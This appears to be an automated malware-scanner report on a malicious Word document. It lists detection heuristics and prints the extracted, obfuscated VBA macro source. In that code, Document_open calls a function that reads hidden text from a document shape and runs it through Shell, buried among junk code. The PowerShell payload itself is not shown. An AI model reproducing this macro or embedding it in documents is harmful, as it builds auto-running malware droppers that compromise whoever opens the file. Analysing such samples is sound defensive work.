MALICIOUS
232
Risk Score
Heuristics 8
-
ClamAV: Doc.Malware.Generic-6749156-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6749156-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
End If KOmqGGHWQO = Shell(tvAmfcY + cdjTt + Xjsiu, vVhGli) If (JbaECUOVq <> 0 Or OkUtdDz) Then -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_open() If (nmIplEaNb <> 0 Or fKiGS) Then -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8933 bytes |
SHA-256: 1475beffdafa01735b275d477eb922c6b4ba133dacee1838bebeb5dc37a05510 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
109 of 173 identifiers look randomly generated (e.g. 'HkjjRPvmBIJ'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wJvMhzXa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function HkjjRPvmBIJ()
Const vVhGli = 581112820 - 581112820
If (EzrLAwDoN <> 0 Or qfjYliKnJ) Then
qfjYliKnJ = True
HiPNmHh = HiPNmHh & YMGoS = EhwRMj / 49323024
If (EzrLAwDoN = 1) Then
HiPNmHh = HiPNmHh & LYozdC = 502363349 + njXIHI
HiPNmHh = HiPNmHh & WjiZtQ = QApCMn / 456287435
HiPNmHh = HiPNmHh & Ejsad = 228746119 / wKaNIE
Else
HiPNmHh = HiPNmHh & dopwh = 161665154 - EizTs
HiPNmHh = HiPNmHh & PuvXz = QOGjDf - dMsLJR
HiPNmHh = HiPNmHh & pKJbL = UCjmHM - HOBBnb
End If
End If
If (pqsCEnnmi <> 0 Or umwZwYvH) Then
umwZwYvH = True
NPwHXGzp = NPwHXGzp & OiqnuP = 107743896 * 227789779
If (pqsCEnnmi = 1) Then
NPwHXGzp = NPwHXGzp & WQwLBr = 251102959 + 475440407
NPwHXGzp = NPwHXGzp & jljFLd = uimsEh * 325471801
NPwHXGzp = NPwHXGzp & jVwFzD = 384764880 / 488416554
Else
NPwHXGzp = NPwHXGzp & AvGrj = bIzwjV + 524635025
NPwHXGzp = NPwHXGzp & RVnBoM = UADvq * pnuBFE
NPwHXGzp = NPwHXGzp & IjqdNi = AlkqJj - YOhvQ
End If
End If
tvAmfcY = Shapes(zulJQDzM + CcdElTLI + 1 + fUcqfa + rYiBY).TextFrame.ContainingRange + OqBaQ + PSKXdJ
If (uIzUcAjvs <> 0 Or WkcptkKKP) Then
WkcptkKKP = True
FiiBAYc = FiiBAYc & mDiUhA = sHwjH * 11826755
If (uIzUcAjvs = 1) Then
FiiBAYc = FiiBAYc & CmaYl = 42984290 - 324745594
FiiBAYc = FiiBAYc & uvdHc = 435285865 * zsQaw
FiiBAYc = FiiBAYc & DXDJo = 394453502 * 475112496
Else
FiiBAYc = FiiBAYc & BCbPA = 279080644 - 364135682
FiiBAYc = FiiBAYc & NiIGCr = 162513903 + 438938860
FiiBAYc = FiiBAYc & dPEih = 36939747 + wBzjH
End If
End If
If (bSmcKfRu <> 0 Or ponVzGA) Then
ponVzGA = True
iuWcK = iuWcK & MKIEJj = zFtJz * 436540278
If (bSmcKfRu = 1) Then
iuWcK = iuWcK & Ovpiw = XlbQCS + KTwPu
iuWcK = iuWcK & RkaSC = INWrjt + AqlHp
iuWcK = iuWcK & Zjnwk = GmwWoz - 327966370
Else
iuWcK = iuWcK & zFjfod = 449240677 * DoiAts
iuWcK = iuWcK & qRWYM = 452886872 * 290952064
iuWcK = iuWcK & zVXdn = 234381136 / YvpLri
End If
End If
If (tGUKzdCMk <> 0 Or mDsWPUawc) Then
mDsWPUawc = True
qihCswFqN = qihCswFqN & rSBwdk = 306210077 - 268195322
If (tGUKzdCMk = 1) Then
qihCswFqN = qihCswFqN & LaiGnk = rjzBjU + tGCDPZ
qihCswFqN = qihCswFqN & SzYLw = GTCts - YOXtjC
qihCswFqN = qihCswFqN & HKIBDK = 103435451 / rzMwvN
Else
qihCswFqN = qihCswFqN & dtaKu = bTXhDJ / vWVMS
qihCswFqN = qihCswFqN & VRHJw = BERIH - 451735700
qihCswFqN = qihCswFqN & wiTuV = jpNSnn + 299991164
End If
End If
KOmqGGHWQO = Shell(tvAmfcY + cdjTt + Xjsiu, vVhGli)
If (JbaECUOVq <> 0 Or OkUtdDz) Then
OkUtdDz = True
YBWLSJ = YBWLSJ & RAsukT = jUPQh * RGwqlu
If (JbaECUOVq = 1) Then
YBWLSJ = YBWLSJ & iLZlPp = hiSwI - YlUVb
YBWLSJ = YBWLSJ & EvAAi = 494161176 / WQsSD
YBWLSJ = YBWLSJ & ZXLBFa = fuzlB - QIQKj
Else
YBWLSJ = YBWLSJ & cPfqCd = 16348497 / uYtZa
YBWLSJ = YBWLSJ & fmYkF = ftOwL - KzwNE
YBWLSJ = YBWLSJ & FMhbR = 112595558 / hJYufi
End If
End If
If (wOrqYSSEw <> 0 Or VAsNDSUG) Then
VAsNDSUG = True
RlBYnJtw = RlBYnJtw & jMDmH = DisRl - 173808310
If (wOrqYSSEw = 1) Then
RlBYnJtw = RlBYnJtw & sYiuzs = 389864908 - zTQYY
RlBYnJtw = RlBYnJtw & iIzqE = 507667841 - 28594441
RlBYnJtw = RlBYnJtw & iVMYml = tqKVaC - kZMWd
Else
RlBYnJtw = RlBYnJtw & QnzmPo = 430289160 + aYtGso
RlBYnJtw = RlBYnJtw & GdfzsJ = zPnwq * 416329321
RlBYnJtw = RlBYnJtw & DbJva = 420035748 + 420493761
End If
End If
If (QrWaIw <> 0 Or IUwEc) Then
IUwEc = True
ROGuNiUb = ROGuNiUb & XMoZR = zPzffZ + OGFru
If (QrWaIw = 1) Then
ROGuNiUb = ROGuNiUb & GiTiV = 154039459 * FoUPi
ROGuNiUb = ROGuNiUb & snzTJl = 429282580 / 452879713
ROGuNiUb = ROGuNiUb & jdIFzY = 188577361 + MwAAoW
Else
ROGuNiUb = ROGuNiUb & QVmEdS = MnizO + 114197937
ROGuNiUb = ROGuNiUb & nlVvzT = OazYU * YrIoU
ROGuNiUb = ROGuNiUb & MMbSMO = TOTpdF + 322340083
End If
End If
If (ZXWOsX <> 0 Or oArNTT) Then
oArNTT = True
siMjUnUO = siMjUnUO & DVdDww = 95958160 * 325558467
If (ZXWOsX = 1) Then
siMjUnUO = siMjUnUO & OjKqfm = 513624474 - 132932200
siMjUnUO = siMjUnUO & kVhuRL = NzavRt / wOwALq
siMjUnUO = siMjUnUO & tOUOp = dhIdG / AcLnt
Else
siMjUnUO = siMjUnUO & CrqXD = iEDPS / 59745003
siMjUnUO = siMjUnUO & qUwLq = MfbvM + ozoMtF
siMjUnUO = siMjUnUO & bEzIwb = LMklM * 37015419
End If
End If
End Function
Private Sub Document_open()
If (nmIplEaNb <> 0 Or fKiGS) Then
fKiGS = True
LwcrHs = LwcrHs & wjVvz = 295986468 + 182296735
If (nmIplEaNb = 1) Then
LwcrHs = LwcrHs & qjzQsK = 224222510 * DDTiA
LwcrHs = LwcrHs & WBTRnF = 198687904 - 362085556
LwcrHs = LwcrHs & RZNmYp = 53148710 / 477558833
Else
LwcrHs = LwcrHs & aKGQIa = kXhtq / 169701047
LwcrHs = LwcrHs & QOIitq = VJiRi * FiRVLs
LwcrHs = LwcrHs & PbtzD = Zalil - 255211725
End If
End If
If (IiDRjshaZ <> 0 Or foiSVm) Then
foiSVm = True
BVAnjo = BVAnjo & LaTQo = fstlhb * 118708661
If (IiDRjshaZ = 1) Then
BVAnjo = BVAnjo & AmTLcq = 4022393 / 87448500
BVAnjo = BVAnjo & OIVHE = SdQYIb / 336543213
BVAnjo = BVAnjo & iGIYQl = lmvwkt / TPBpL
Else
BVAnjo = BVAnjo & dGCFMM = RCcUd + 95810089
BVAnjo = BVAnjo & lsudu = qBYbMZ - KbwNO
BVAnjo = BVAnjo & zlLbDD = 280276657 * 87618199
End If
End If
HkjjRPvmBIJ
If (jGdEUo <> 0 Or AmtMd) Then
AmtMd = True
HYBXqwhNH = HYBXqwhNH & wUfTBJ = pKWhJ * 47345708
If (jGdEUo = 1) Then
HYBXqwhNH = HYBXqwhNH & QKtqB = ZhBAw / zbbLzv
HYBXqwhNH = HYBXqwhNH & YVfjp = BqRDC + LzTkM
HYBXqwhNH = HYBXqwhNH & GfCiDw = 23194834 + 447337873
Else
HYBXqwhNH = HYBXqwhNH & jaEht = Nacljl * 317359557
HYBXqwhNH = HYBXqwhNH & EVzUHd = tnuiqO / 146543904
HYBXqwhNH = HYBXqwhNH & qPDpR = 374399508 + QJtzIX
End If
End If
If (WjKaTiIT <> 0 Or mHuUpFf) Then
mHuUpFf = True
fpBYToNlj = fpBYToNlj & ZRqai = 473393776 / 242045561
If (WjKaTiIT = 1) Then
fpBYToNlj = fpBYToNlj & FioRmG = CIZbHo - 458616001
fpBYToNlj = fpBYToNlj & vGwNXW = 34666022 - MDvwo
fpBYToNlj = fpBYToNlj & KiCiLZ = PLQND - 352477672
Else
fpBYToNlj = fpBYToNlj & zwQuN = 104483240 / zDZTU
fpBYToNlj = fpBYToNlj & CLltat = zThUG * 88645439
fpBYToNlj = fpBYToNlj & PhiNkp = JzYFvJ - 145993143
End If
End If
If (rjlOhFJNT <> 0 Or kXsFGQd) Then
kXsFGQd = True
DzYOq = DzYOq & ilTFmj = 348240897 + RLfGjw
If (rjlOhFJNT = 1) Then
DzYOq = DzYOq & YkGUP = zSqErI + lFkRcs
DzYOq = DzYOq & kwmEam = 209891006 * 64573101
DzYOq = DzYOq & TLMzW = 367634309 + 358431335
Else
DzYOq = DzYOq & XlTrE = zpLuPN * 131621468
DzYOq = DzYOq & FLLaOi = 272404642 + 523637406
DzYOq = DzYOq & AVcwBt = 507053580 + 165516450
End If
End If
If (jjMjzmsk <> 0 Or haazasfa) Then
haazasfa = True
fOXKZvRCK = fOXKZvRCK & bCLkDL = Eiurb + 376732501
If (jjMjzmsk = 1) Then
fOXKZvRCK = fOXKZvRCK & FjVOr = qQNXRs * RVKQS
fOXKZvRCK = fOXKZvRCK & czIiWq = 431827869 - mMozf
fOXKZvRCK = fOXKZvRCK & EsRbDh = 187191113 * 463489577
Else
fOXKZvRCK = fOXKZvRCK & RUiOi = 86021456 / 218752483
fOXKZvRCK = fOXKZvRCK & srtsuR = 202384136 + 117939640
fOXKZvRCK = fOXKZvRCK & vwYwFw = 412774026 - 369674298
End If
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.